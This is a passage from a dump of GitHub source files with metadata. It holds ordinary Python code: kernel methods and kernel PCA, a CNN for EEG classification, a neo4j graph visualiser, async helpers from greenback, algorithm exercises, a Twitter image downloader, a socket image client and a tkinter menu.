pairwise_dists = squareform(pdist(X, 'sqeuclidean'))\n K = np.exp(-pairwise_dists / (2 * np.square(sigma)))\n # print(time.time()-st)\n return K\n\n def fit(self, X, y, penalty, max_iter=1000, eps=1e-6):\n \"\"\"\n Iteratively solve Weighted Kernel Ridge Regression problems\n \"\"\"\n\n self.X_train = X\n K = self.get_kernel_gram_matrix(X, self.sigma)\n self.wkrr.K_train = K\n\n # For training only, transform labels in [1,-1]\n y = np.where(y == 1, 1, 0)\n\n assert K.shape[0] == y.shape[0]\n n = K.shape[0]\n ones = np.ones(y.shape)\n\n # randomly initialize the coefficients\n alpha = np.random.normal(loc=0, scale=1, size=n)\n\n # t1 = time.time()\n\n # initialize loss\n loss = 10\n\n for i in range(max_iter):\n # At each iteration solve a Weighted kernel ridge regression\n v = K @ alpha\n prev_loss = loss\n loss = -np.sum(np.log(expit(np.multiply(y, v)) + eps)) / n\n print(loss)\n if np.abs(loss - prev_loss) < self.loss_thresh:\n print('converged after {} iterations'.format(i + 1))\n break\n\n # compute parameters for WKRR\n u = np.multiply(v, y)\n sig = expit(u)\n sig_ = ones - sig # 1-sig = expit(-u)\n W = np.diag(np.multiply(sig, (sig_)))\n # print(W.shape)\n P = np.diag(-sig_)\n k = P @ y\n z = v - scipy.linalg.inv(W) @ k\n # t2 = time.time()\n # print(t2-t1)\n\n # solve a weighted Kernel Ridgre Regression with the corresponding parameters\n alpha = self.wkrr.fit(X, z, penalty, sigma, W=W, kernel_precomputed=True)\n # t3 = time.time()\n # print(t3-t2)\n\n # save fitted parameters\n self.weights = alpha\n\n def predict_probas(self, X):\n\n try:\n assert self.kernel == 'gaussian'\n # compute pairwise (squared euclidean) distances between new samples and train samples\n pairwise_dists = cdist(self.X_train, X, 'sqeuclidean')\n # gaussian kernel evaluations\n K_pred = np.exp(-pairwise_dists / (2 * np.square(self.sigma)))\n\n pred_probas = expit(K_pred.T @ self.weights)\n return pred_probas\n\n except:\n print('Please make sure the used kernel is gaussian.')\n\n def predict(self, X):\n probas = self.predict_probas(X=X)\n return (probas > 0.5).astype(int)\n\n def get_accuracy_score(self, X, y):\n pred_labels = self.predict(X=X)\n return (pred_labels == y).mean()\n\n\nclass KernelPCA():\n\n def __init__(self, n_components):\n self.number_components = n_components\n\n # @staticmethod\n def get_wanted_eigenvectors_eigenvalues(self, w, v, ):\n L = [(w[i], v[i, :]) for i in range(w.shape[0])]\n L = sorted(L, key=lambda x: x[0], reverse=True)\n return np.array([L[i][0] for i in range(self.number_components)]), \\\n np.array([L[i][1] for i in range(self.number_components)])\n\n def fit_transform(self, K, eps=1e-6):\n n = K.shape[0]\n U = (1 / n) * np.ones((n, n))\n centred_K = (np.eye(n) - U) @ K @ (np.eye(n) - U)\n\n w, v = np.linalg.eig(centred_K)\n # We had some negative/complex eigen values even if the matrix is symmetric which \n # can mainly be due to some approximations made when computing the eigenvectors \n w = np.array(list(map(lambda x: x.real if x.real > 0 else eps, w)))\n v = np.real(v)\n w, v = self.get_wanted_eigenvectors_eigenvalues(w, v)\n\n alpha = v / np.sqrt(w[:, None])\n self.alpha = alpha\n\n return K @ alpha.T\n\n def transform(self, X):\n return X @ self.alpha.T","repo_name":"MedAmineHachicha/kernel_methods_challenge","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19906744284","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef printsomething():\n print(\"Something\")\n\n#display function\ndef runtime_display(display, u, x, xmin,xmax,ymin,ymax):\n plt.axis([xmin, xmax, ymin, ymax ] )\n plt.title(display)\n plt.ylabel(\"U\")\n plt.xlabel(\"x\")\n plt.plot(x,u,'bo-')\n plt.pause(0.001)\n plt.clf() #clear drawing\n return 0\n","repo_name":"izham-sugita/ENT441-CFD","sub_path":"ent441-slides/codes/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"19494238042","text":"\"\"\"\nThis is a numpy reader/ writer module.\n\"\"\"\n# import standard modules\nimport numpy\n# help(numpy)\n\n# import custom modules\nfrom serializers.serialize_template import Serializer\n\n# define private variables\n__version__ = \"1.0.0\"\n\n# define class variables\nSerializer.SERIALIZER_TYPE = \"npy\"\n\n\nclass SerializeFile(Serializer):\n def __init__(self):\n # get the input data\n Serializer.__init__(self)\n self.DATA_TYPE = \"dictionary\"\n\n def read(self, f_name=\"\"):\n \"\"\"\n read the numpy file.\n :param f_name: file input name.\n :return: True for success. False for failure.\n \"\"\"\n success = Serializer.read(self, f_name=f_name)\n\n if not success:\n raise IOError(\"[No File] :: There is no file to read from.\")\n try:\n rdata = numpy.load(self.OUTPUT_PATH, encoding='bytes', allow_pickle=True)\n self.READ_DATA = rdata.tolist()\n return True\n except ValueError:\n return False\n\n def write(self, f_output=\"\", f_data=\"\"):\n \"\"\"\n writes the numpy file.\n :param f_output: custom file output name.\n :param f_data: data to write.\n :return: True for success. False for failure.\n \"\"\"\n Serializer.write(self, f_output=f_output, f_data=f_data)\n\n try:\n numpy.save(self.OUTPUT_PATH, self.INTERPRETED_INPUT_DATA)\n self.print_file_size()\n return True\n except ValueError:\n return False\n","repo_name":"AlexGaida/data_serializer","sub_path":"python/serializers/serialize_numpy.py","file_name":"serialize_numpy.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14045645733","text":"import json\nimport os\nimport uuid\nfrom tempfile import NamedTemporaryFile\nfrom typing import List\n\nimport pkg_resources\nimport py2neo\nfrom IPython.display import HTML, IFrame, Image, display_html\nfrom jinja2 import Environment, FileSystemLoader\n\n\ndef plot(\n graph: py2neo.Graph, query: str = \"match p=()--()--() return p limit 25\", **kwargs\n) -> IFrame:\n \"\"\"Plot a graph, using a query.\n\n Heavy lifting is done via py2neo `to_subgraph` and `neographviz.vis_network`\n\n Example:\n >>> from neographviz import plot, Graph\n >>> graph = Graph() # You need a graph at localhos, or pass the uri here.\n >>> plot(graph)\n\n Args:\n graph (py2neo.Graph): Graph object from py2neo\n query (str, optional): Any valid cypher query, must return a path p, should use a limit. Defaults to \"match p=()--()--() return p limit 25\".\n\n Returns:\n IFrame: IFrame to show in jupyter notebook or website.\n \"\"\"\n sg = graph.run(query).to_subgraph()\n return vis_network(_get_nodes(sg), _get_edges(sg), **kwargs)\n\n\ndef _get_nodes(sg: py2neo.Subgraph) -> List[dict]:\n \"\"\"Get nodes from a subgraph\n \n Get the nodes in a subgraph and add the data so that\n visjs can consume it. \n\n Arguments:\n sg {py2neo.Subgraph} -- \n \n Returns:\n List -- List of dictionaries with keys: id, group, label, title\n \"\"\"\n nodes = []\n if sg:\n for n in sg.nodes:\n nodes.append(\n {\n \"id\": n.identity,\n \"group\": n.labels.__str__()[1:],\n \"label\": \" \".join([f\"{v}\" for v in n.values()]),\n \"title\": \" \".join([f\"{k}:{v}\" for k, v in n.items()]),\n }\n )\n return nodes\n\n\ndef _get_edges(sg: py2neo.Subgraph) -> List:\n edges = []\n if sg:\n for r in sg.relationships:\n d = {\n \"from\": r.start_node.identity,\n \"to\": r.end_node.identity,\n \"label\": next(iter(r.types())),\n \"arrows\": \"to\",\n }\n try:\n d[\"title\"] = \" \".join([str(k) + \":\" + str(v) for k, v in r.items()])\n except:\n pass\n edges.append(d)\n return edges\n\n\ndef vis_network(\n nodes,\n edges,\n physics=\"\",\n height=400,\n node_size=25,\n font_size=14,\n filename=\"\",\n config={},\n template_file=\"vis.html\",\n app=False,\n):\n \"\"\"Render a network with vis.js in an IFrame for use in a jupyter notebook or website. \n\n This function will render a template whihc uses vis.js to display the graph. \n The options configured can be passed directly to the template, but as it is vis.js underneith,\n any valid options for it can be passed as js in string form to jsoptions.\n\n Args:\n nodes (List): List of nodes\n edges (List): List of edges\n physics (str, optional): Defintion of physics in vis.js. Defaults to basic barnesHut.\n height (int, optional): Height of the plot in pixels. Defaults to 400.\n node_size (int, optional): Defaults to 25.\n font_size (int, optional): [description]. Defaults to 14.\n filename (str, optional): Optional filenmae for storing the page. Defaults to a `''` and uses a uuid.\n config (dict, optional): Custom kwargs to pass to template. Defaults to `{}`.\n template_file (str, optional): Defaults to `vis.html` the provided template, provide your own.\n\n Returns:\n IFrame: Iframe to show in jupyter notebook\n \"\"\"\n template = pkg_resources.resource_filename(\"neographviz\", \"templates/\")\n env = Environment(loader=FileSystemLoader(template))\n template = env.get_template(template_file)\n if not physics:\n physics = \"\"\"{\n \"barnesHut\": {\n \"centralGravity\": 0,\n \"springLength\": 240\n }\n }\"\"\"\n\n if not app:\n html = template.render(\n nodes=nodes,\n edges=edges,\n physics=physics,\n node_size=node_size,\n font_size=font_size,\n )\n unique_id = str(uuid.uuid4())\n if not filename:\n filename = \"figure/graph-{}.html\".format(unique_id)\n try:\n with open(filename, \"w\") as file:\n file.write(html)\n except FileNotFoundError:\n os.mkdir(\"figure\")\n with open(filename, \"w\") as file:\n file.write(html)\n\n return IFrame(filename, width=\"100%\", height=str(height))\n else:\n return template.render(\n nodes=nodes,\n edges=edges,\n physics=physics,\n node_size=node_size,\n font_size=font_size,\n app=app\n )\n\n\ndef get_vis_info(node, id, options):\n node_label = list(node.labels)[0]\n title = \"\".join([f\"{k}:{v} \" for k, v in node.items()]).strip()\n if node_label in options:\n vis_label = node.get(options.get(node_label, \"\"), \"\")\n else:\n vis_label = title\n\n return {\"id\": id, \"label\": vis_label, \"group\": node_label, \"title\": title}\n","repo_name":"niiicolai/PythonOverlay","sub_path":"venv/Lib/site-packages/neographviz/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5995083741","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nnumlist = list(map(int, sys.stdin.readline().split()))\nresult = []\nans = 0\n\n\ndef dfs(start):\n global ans\n if len(result) == 3:\n if sum(result) <= m:\n if m - ans > m - sum(result):\n ans = sum(result)\n return\n for i in range(start, n):\n result.append(numlist[i])\n dfs(i + 1)\n result.pop()\n\n\ndfs(0)\nprint(ans)\n","repo_name":"Lee9Bin/python_algorism","sub_path":"algorism/daily/2798.py","file_name":"2798.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16380681523","text":"# Convolutional Neural Network for EEG classification\n\nimport os\nimport numpy as np\nimport network\n\nfrom pylab import imshow, show, cm\nfrom network import Network, shared, relu\nfrom network import ConvLayer, ConvPoolLayer, FullyConnectedLayer, SoftmaxLayer\n\n# Load EEG data\nparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))\ndata_dir = os.path.join(parent_dir, \"data\")\n\ndata = np.load(os.path.join(data_dir, 'all_data_6_1d_full.npy'))\n\nlabels = np.load(os.path.join(data_dir, 'all_data_6_1d_full_labels.npy'))\nlabels = labels[:,1]\n\n# Create train, validation, test sets\n#rng = np.random.RandomState(225)\nindices = np.random.permutation(data.shape[0])\n\nsplit_train, split_val, split_test = .6, .2, .2\n\nsplit_train = int(round(data.shape[0]*split_train))\nsplit_val = split_train + int(round(data.shape[0]*split_val))\n\ntrain_idx = indices[:split_train]\nval_idx = indices[split_train:split_val]\ntest_idx = indices[split_val:]\n\ntr_data = data[train_idx,:]\ntr_labels = labels[train_idx]\n\nval_data = data[val_idx,:]\nval_labels = labels[val_idx]\n\nte_data = data[test_idx,:]\nte_labels = labels[test_idx]\n\ntrain_data = shared((tr_data, tr_labels))\nvalidation_data = shared((val_data, val_labels))\ntest_data = shared((te_data, te_labels))\n\n# Show a single random trial\nimage_num = np.random.randint(0, network.size(train_data))\nimage_label = str(train_data[1][image_num].eval())\nimage_array = train_data[0][image_num].eval()\nimage_2d = np.reshape(image_array, (64, 512))\n\nimshow(image_2d, cmap=cm.gray)\nshow()\nprint(\"Label: {}\".format(image_label))\n\n# Train\nmini_batch_size = 10\n\ndef basic_conv(n=3, epochs=60):\n nets = [] # list of networks (for ensemble, if desired)\n for j in range(n):\n net = Network([\n ConvLayer(image_shape=(mini_batch_size, 1, 64, 512),\n filter_shape=(20, 1, 3, 3), stride=(1, 1), activation_fn=relu),\n ConvPoolLayer(image_shape=(mini_batch_size, 20, 64, 512),\n filter_shape=(40, 20, 3, 3), stride=(1, 1),\n poolsize=(2, 2), activation_fn=relu),\n ConvPoolLayer(image_shape=(mini_batch_size, 40, 32, 256),\n filter_shape=(80, 40, 3, 3), stride=(1, 1),\n poolsize=(2, 2), activation_fn=relu),\n FullyConnectedLayer(n_in=80*16*128, n_out=100),\n SoftmaxLayer(n_in=100, n_out=2)],\n mini_batch_size, 50)\n \n net.SGD(train_data, epochs, mini_batch_size, 0.1,\n validation_data, test_data, lmbda=0.0)\n \n nets.append(net) # Add current network to list\n return nets\n\nconv_net = basic_conv(n=1, epochs=2)\n\n# Plot training curve for 1 network\nconv_net[0].plot_training_curve()\n\n# Plot validation/test accuracy curve for 1 network\nconv_net[0].plot_accuracy_curve()\n\n# Create a plot of the learned filters for first conv layer\nconv_net[0].layers[0].plot_filters(4, 5, \"Filters - Layer 1\") # 20 filters\n","repo_name":"sho-87/python-machine-learning","sub_path":"CNN/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"23958096792","text":"\nimport tweepy\nimport wget\n\n\nconsumerKey = \"Your key here\"\nconsumerSecret = \"Your key here\"\naccessToken = \"Your key here\"\naccessTokenSecret = \"Your key here\"\n\nauth = tweepy.OAuthHandler(consumer_key = consumerKey, consumer_secret = consumerSecret)\nauth.set_access_token(accessToken , accessTokenSecret)\napi = tweepy.API(auth)\n\nsearchTerm = input(\"Enter the hashtag to search for \")\nn = int(input(\"Enter the number of tweets to search for \"))\n\ntweets = tweepy.Cursor(api.search, q = searchTerm, result_type = \"recent\").items(n)\n\nneg = 0\npos = 0\nneu = 0\npol = 0\n\nmedia_url = []\n\nfor tweet in tweets:\n\n media = tweet.entities.get('media',[])\n if(len(media)):\n media_url.append(media[0]['media_url'])\n\ni = 1\n\nfor media in media_url:\n wget.download(media, out = str(i) + \".jpg\")\n i+=1\n","repo_name":"Anmay5525/Image_extractor","sub_path":"img_extract.py","file_name":"img_extract.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"17562573375","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n list1_cur = list1\n list2_cur = list2\n answer = ListNode()\n answer_cur = answer\n \n while list1_cur and list2_cur:\n if list1_cur.val <= list2_cur.val: \n answer_cur.next = ListNode(list1_cur.val)\n list1_cur = list1_cur.next\n else: \n answer_cur.next = ListNode(list2_cur.val)\n list2_cur = list2_cur.next\n answer_cur = answer_cur.next\n \n if list1_cur: \n answer_cur.next = list1_cur\n elif list2_cur: \n answer_cur.next = list2_cur\n \n return answer.next","repo_name":"python-algorithm-study-and-learning/Sangjun","sub_path":"ch08/08-14.py","file_name":"08-14.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23061546641","text":"import collections\nfrom typing import List\n\nfrom bst_node import BstNode\nfrom test_framework import generic_test\n\nInterval = collections.namedtuple('Interval', ('left', 'right'))\n\n\n# def range_lookup_in_bst(tree: BstNode, interval: Interval) -> List[int]:\n# def in_order(tree):\n# if not tree:\n# return\n# in_order(tree.left)\n# if interval.left <= tree.data <= interval.right:\n# result.append(tree.data)\n# in_order(tree.right)\n#\n# result = []\n# in_order(tree)\n# return result\n\ndef range_lookup_in_bst(tree: BstNode, interval: Interval) -> List[int]:\n\n def f(tree):\n if not tree:\n return\n if interval.left <= tree.data <= interval.right:\n f(tree.left)\n result.append(tree.data)\n f(tree.right)\n elif tree.data > interval.left:\n f(tree.left)\n else:\n f(tree.right)\n\n result = []\n f(tree)\n return result\n\ndef range_lookup_in_bst_wrapper(tree, i):\n return range_lookup_in_bst(tree, Interval(*i))\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('range_lookup_in_bst.py',\n 'range_lookup_in_bst.tsv',\n range_lookup_in_bst_wrapper))\n","repo_name":"prrraveen/Elements_of_programming_interview","sub_path":"epi_judge_python/range_lookup_in_bst.py","file_name":"range_lookup_in_bst.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7284263601","text":"\nimport numpy as np, cv2\ndef contain(p, shape): # 좌표(y,x)가 범위내 인지 검사\n return 0<= p[0] < shape[0] and 0<= p[1] < shape[1]\n\ndef bilinear_value(img, pt):\n x, y = np.int32(pt)\n if x >= img.shape[1]-1: x = x -1\n if y >= img.shape[0]-1: y = y - 1\n\n P1, P3, P2, P4 = np.float32(img[y:y+2,x:x+2].flatten())\n alpha, beta = pt[1] - y, pt[0] - x # 거리 비율\n M1 = P1 + alpha * (P3 - P1) # 1차 보간\n M2 = P2 + alpha * (P4 - P2)\n P = M1 + beta * (M2 - M1) # 2차 보간\n return np.clip(P, 0, 255) # 화소값 saturation후 반환\n\n\ndef calc_length(pts):\n d1 = np.subtract(pts[0], pts[1]).astype(float) # 두 좌표간 차분 계산\n length =(d1[0]**2+d1[1]**2)**0.5\n return (length)\n\ndef calc_gragient(pts):\n d1 = np.subtract(pts[0], pts[1]).astype(float) # 두 좌표간 차분 계산\n angle = cv2.fastAtan2(d1[0], d1[1]) # 차분으로 각도 계산\n return (angle)\n\n\ndef rotate(img, degree):\n dst = np.zeros(img.shape[:2], img.dtype) # 목적 영상 생성\n radian = (degree/180) * np.pi # 회전 각도 - 라디언\n sin, cos = np.sin(radian), np.cos(radian) # 사인, 코사인 값 미리 계산\n for i in range(img.shape[0]): # 목적 영상 순회 - 역방향 사상\n for j in range(img.shape[1]):\n y = -j * sin + i * cos\n x = j * cos + i * sin # 회선 변환 수식\n if contain((y, x), img.shape): # 입력 영상의 범위 확인\n dst[i, j] = bilinear_value(img, [x, y]) # 화소값 양선형 보간\n return dst\n\n\n\ndef draw_point(x, y):\n pts.append([x,y])\n print(\"좌표:\", len(pts), [x,y])\n cv2.circle(tmp, (x, y), 2, 255, 2) # 중심 좌표 표시\n\ndef onMouse(event, x, y, flags, param):\n global tmp, pts\n if (event == cv2.EVENT_LBUTTONDOWN and len(pts) == 0): \n draw_point(x, y)\n if (event == cv2.EVENT_LBUTTONUP and len(pts) == 1): \n draw_point(x, y)\n if len(pts) == 2:\n cv2.line(image, tuple(pts[0]), tuple(pts[1]), 255)\n legth = calc_length(pts) # 회전각 계산\n print(\"length : %3.2f\" % legth)\n angle = calc_gragient(pts) # 회전각 계산\n print(\"gradient : %3.2f\" % angle)\n dst = rotate(image, angle) # 사용자 정의 함수 회전 수행\n cv2.imshow(\"image\", dst) \n tmp = np.copy(image) # 임시 행렬 초기화\n pts = []\n\nimage = cv2.imread('images/rotate.jpg', cv2.IMREAD_GRAYSCALE)\nif image is None: raise Exception(\"영상 파일을 읽기 에러\")\ntmp = np.copy(image)\npts = []\n\ncv2.imshow(\"image\", image)\ncv2.setMouseCallback(\"image\", onMouse, 0)\ncv2.waitKey(0)","repo_name":"ksyeun/2022_1_SSU_AI_Computer-Vision","sub_path":"Exercise Problem/exercise815.py","file_name":"exercise815.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31907280768","text":"from django.shortcuts import get_object_or_404, render\nfrom .models import Book\nfrom django.http import Http404\nfrom django.db.models import Avg\n# Create your views here.\n\n\ndef index(request):\n all_books = Book.objects.all().order_by(\"rating\") # you can put -\n nofbooks = all_books.count()\n avg_rating = all_books.aggregate(Avg(\"rating\")) # rating__avg, rating__min\n\n return render(request, \"book_outlet/index.html\", {\n \"books\": all_books,\n \"total_number_of_books\": nofbooks,\n \"average_rating\": avg_rating,\n })\n\n\ndef book_detail(request, slug):\n # try:\n # book = Book.objects.get(pk=id)\n # except:\n # raise Http404()\n book = get_object_or_404(Book, slug=slug)\n return render(request, \"book_outlet/book_detail.html\", {\n \"title\": book.title,\n \"author\": book.author,\n \"rating\": book.rating,\n \"is_bestselling\": book.is_bestselling\n })\n","repo_name":"tahaenesaslanturk/book_store","sub_path":"book_outlet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12912354233","text":"import sys\nfrom functools import wraps\nfrom typing import (\n Any,\n AsyncIterable,\n AsyncGenerator,\n AsyncContextManager,\n Iterator,\n Awaitable,\n Callable,\n Generic,\n Optional,\n TypeVar,\n cast,\n overload,\n)\nfrom ._impl import await_, with_portal_run_sync\n\nT = TypeVar(\"T\")\nF = TypeVar(\"F\", bound=Callable[..., Any])\nAF = TypeVar(\"AF\", bound=Callable[..., Awaitable[Any]])\n\n\ndef autoawait(fn: Callable[..., Awaitable[T]]) -> Callable[..., T]:\n \"\"\"Decorator for an async function which allows (and requires) it to be called\n from synchronous contexts without ``await``.\n\n For example, this can be used for magic methods, property setters, and so on.\n \"\"\"\n\n @wraps(fn)\n def wrapper(*args: Any, **kw: Any) -> T:\n return await_(fn(*args, **kw))\n\n return wrapper\n\n\n# For signature-preserving decorators we can declare the result as\n# signature-preserving too, and catch the case where the inner function isn't async\n@overload\ndef decorate_as_sync(decorator: Callable[[F], F]) -> Callable[[AF], AF]:\n ...\n\n\n# For non-signature-preserving, all we can do is say the inner function and\n# the decorated function are both async. (This could be improved using ParamSpec\n# for decorators that are args-preserving but not return-type-preserving.)\n@overload\ndef decorate_as_sync(\n decorator: Callable[..., Any]\n) -> Callable[[Callable[..., Awaitable[Any]]], Callable[..., Awaitable[Any]]]:\n ...\n\n\ndef decorate_as_sync(decorator: Any) -> Any:\n \"\"\"Wrap the synchronous function decorator *decorator* so that it can\n be used to decorate an async function.\n\n This can be used, for example, to apply an async-naive decorator such as\n `@functools.lru_cache() ` to an async function::\n\n @greenback.decorate_as_sync(functools.lru_cache(maxsize=128))\n async def some_fn(...): ...\n\n Without the wrapping in :func:`decorate_as_sync`, the LRU cache\n would treat the inner function as a synchronous function, and\n would therefore unhelpfully cache the coroutine object that is\n returned when an async function is called without ``await``.\n\n Internally, the \"inner\" async function is wrapped in a synchronous\n function that invokes that async function using\n :func:`greenback.await_`. This synchronous function is then\n decorated with the *decorator*. :func:`decorate_as_sync` returns\n an \"outer\" async function which invokes the internal decorated\n synchronous function using :func:`greenback.with_portal_run_sync`.\n\n In other words, the following two calls behave identically::\n\n result = await greenback.decorate_as_sync(decorator)(async_fn)(*args, **kwds)\n result = await greenback.with_portal_run_sync(\n decorator(greenback.autoawait(async_fn)), *args, **kwds,\n )\n\n \"\"\"\n\n def decorate(async_fn: Any) -> Any:\n @decorator # type: ignore # \"Untyped decorator makes 'inner' untyped\"\n @wraps(async_fn)\n def inner(*args: Any, **kwds: Any) -> Any:\n return await_(async_fn(*args, **kwds))\n\n @wraps(inner)\n async def outer(*args: Any, **kwds: Any) -> Any:\n return await with_portal_run_sync(inner, *args, **kwds)\n\n return outer\n\n return decorate\n\n\nclass async_context(Generic[T]):\n \"\"\"Wraps an async context manager so it is usable in a synchronous\n ``with`` statement.\"\"\"\n\n __slots__ = (\"_cm\", \"_aexit\")\n\n def __init__(self, cm: AsyncContextManager[T]):\n self._cm = cm\n\n if sys.version_info >= (3, 11):\n\n def __enter__(self) -> T:\n try:\n aenter = type(self._cm).__aenter__\n except AttributeError:\n raise TypeError(\n f\"{type(self._cm).__name__!r} object does not support the \"\n \"asynchronous context manager protocol\"\n ) from None\n try:\n self._aexit = type(self._cm).__aexit__\n except AttributeError:\n raise TypeError(\n f\"{type(self._cm).__name__!r} object does not support the \"\n \"asynchronous context manager protocol (missed __aexit__ method)\"\n ) from None\n return await_(aenter(self._cm))\n\n else:\n\n def __enter__(self) -> T:\n try:\n self._aexit = type(self._cm).__aexit__\n except AttributeError:\n raise AttributeError(\n f\"type object {type(self._cm).__name__!r} has no attribute '__aexit__'\"\n ) from None\n aenter = type(self._cm).__aenter__\n return await_(aenter(self._cm)) # type: ignore\n\n def __exit__(self, *exc: Any) -> Optional[bool]:\n return await_(self._aexit(self._cm, *exc)) # type: ignore\n\n\nclass async_iter(Generic[T]):\n \"\"\"Wraps an async iterator so it is usable in a synchronous\n ``for`` loop, ``yield from`` statement, or other context that expects\n a synchronous iterator.\"\"\"\n\n __slots__ = (\"_it\",)\n\n def __init__(self, iterable: AsyncIterable[T]):\n try:\n aiter = type(iterable).__aiter__\n except AttributeError:\n raise TypeError(\n \"'async_iter' requires an object with __aiter__ method, got \"\n + type(iterable).__name__\n ) from None\n self._it = aiter(iterable) # type: ignore\n try:\n type(self._it).__anext__\n except AttributeError:\n raise TypeError(\n \"'async_iter' received an object from __aiter__ that does not \"\n \"implement __anext__: \" + type(self._it).__name__\n ) from None\n if all(hasattr(self._it, meth) for meth in (\"asend\", \"athrow\", \"aclose\")):\n self.__class__ = async_generator\n\n def __iter__(self) -> Iterator[T]:\n return self\n\n def __next__(self) -> T:\n try:\n return await_(type(self._it).__anext__(self._it)) # type: ignore\n except StopAsyncIteration as ex:\n raise StopIteration(*ex.args)\n\n\nclass async_generator(async_iter[T]):\n __slots__ = ()\n\n def send(self, val: Any) -> T:\n try:\n return await_(cast(AsyncGenerator[T, Any], self._it).asend(val))\n except StopAsyncIteration as ex:\n raise StopIteration(*ex.args)\n\n def throw(self, *exc: Any) -> T:\n try:\n return await_(cast(AsyncGenerator[T, Any], self._it).athrow(*exc))\n except StopAsyncIteration as ex:\n raise StopIteration(*ex.args)\n\n def close(self) -> None:\n return await_(cast(AsyncGenerator[T, Any], self._it).aclose())\n","repo_name":"oremanj/greenback","sub_path":"greenback/_util.py","file_name":"_util.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"69"}
+{"seq_id":"73130414620","text":"import json\nimport click\nfrom vl_bench.utils import process_path\n\n@click.command()\n@click.argument('inputs', nargs=-1)\n@click.option('--output', required=True)\ndef main(inputs, output):\n merged = {}\n for input_file in inputs:\n filepath = process_path(input_file)\n with open(filepath, 'r') as f:\n merged.update(json.load(f))\n \n with open(process_path(output), 'w') as f:\n json.dump(merged, f, indent=4)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ilkerkesen/ViLMA","sub_path":"tasks/counting/merge_result_files.py","file_name":"merge_result_files.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"2951722648","text":"def linkedListPalindrome(head):\n\tslowNode = fastNode = head\n\twhile fastNode is not None and fastNode.next is not None:\n\t\tslowNode = slowNode.next\n\t\tfastNode = fastNode.next.next\n\t\n\treverseList = reverseLinkedList(slowNode)\n\tnode = head\n\twhile reverseList is not None:\n\t\tif node.value != reverseList.value:\n\t\t\treturn False\n\t\tnode = node.next\n\t\treverseList = reverseList.next\n\treturn True\n\t\ndef reverseLinkedList(node):\n\tprevNode = None\n\tcurNode = node\n\twhile curNode is not None:\n\t\tnextNode = curNode.next\n\t\tcurNode.next = prevNode\n\t\tprevNode = curNode\n\t\tcurNode = nextNode\n\treturn prevNode\n\nhead = None\nresults = linkedListPalindrome(head)\nprint(results)","repo_name":"shengng325/LeetCode.py","sub_path":"linkedListPalindrome.py","file_name":"linkedListPalindrome.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37441237468","text":"import socket\r\nimport time\r\n#import cv2, os\r\n\r\nconn = socket.socket() \r\nhost = '169.254.16.35'\r\nport = 8080\r\nconn.connect((host,port)) #Establishes server-client connection\r\nprint(\"Connected to\", host,\" on port\", port) \r\n\r\ndef receive_image():\r\n size = eval(conn.recv(2048).decode()) #returns image size in bytes\r\n conn.send(b'1') \r\n #print(size)\r\n \r\n pack_size = 2048 #splitting image receival pack size into smaller packs, allowing complete capture of image\r\n img_data = b''\r\n while len(img_data) None:\n super().__init__(master)\n\n self.file_menu = tk.Menu(self, tearoff=0)\n self.add_cascade(label=\"File\", menu=self.file_menu)\n self.file_menu.add_command(label=\"Restart (R)\")\n self.file_menu.add_separator()\n self.file_menu.add_command(label=\"Quit (Q)\", command=self.exit_command)\n\n self.settings_menu = tk.Menu(self, tearoff=0)\n self.add_cascade(label=\"Edit\", menu=self.settings_menu)\n self.settings_menu.add_command(label=\"Preferences (S)\", command=self.settings_command)\n\n self.help_menu = tk.Menu(self, tearoff=0)\n self.add_cascade(label=\"Help\", menu=self.help_menu)\n self.help_menu.add_command(label=\"Homepage\", command=self.help_command)\n self.help_menu.add_command(label=\"About\", command=self.about_command)\n\n master.config(menu=self)\n\n def exit_command(self) -> None:\n \"\"\"Closes the game.\"\"\"\n self.master.destroy()\n logger.debug(\"\")\n\n def settings_command(self) -> None:\n settings = SettingsWindow(self.master)\n settings.grab_set()\n logger.debug(\"\")\n\n def help_command(self) -> None:\n url = default_config[\"INFO\"][\"REPOSITORY\"]\n 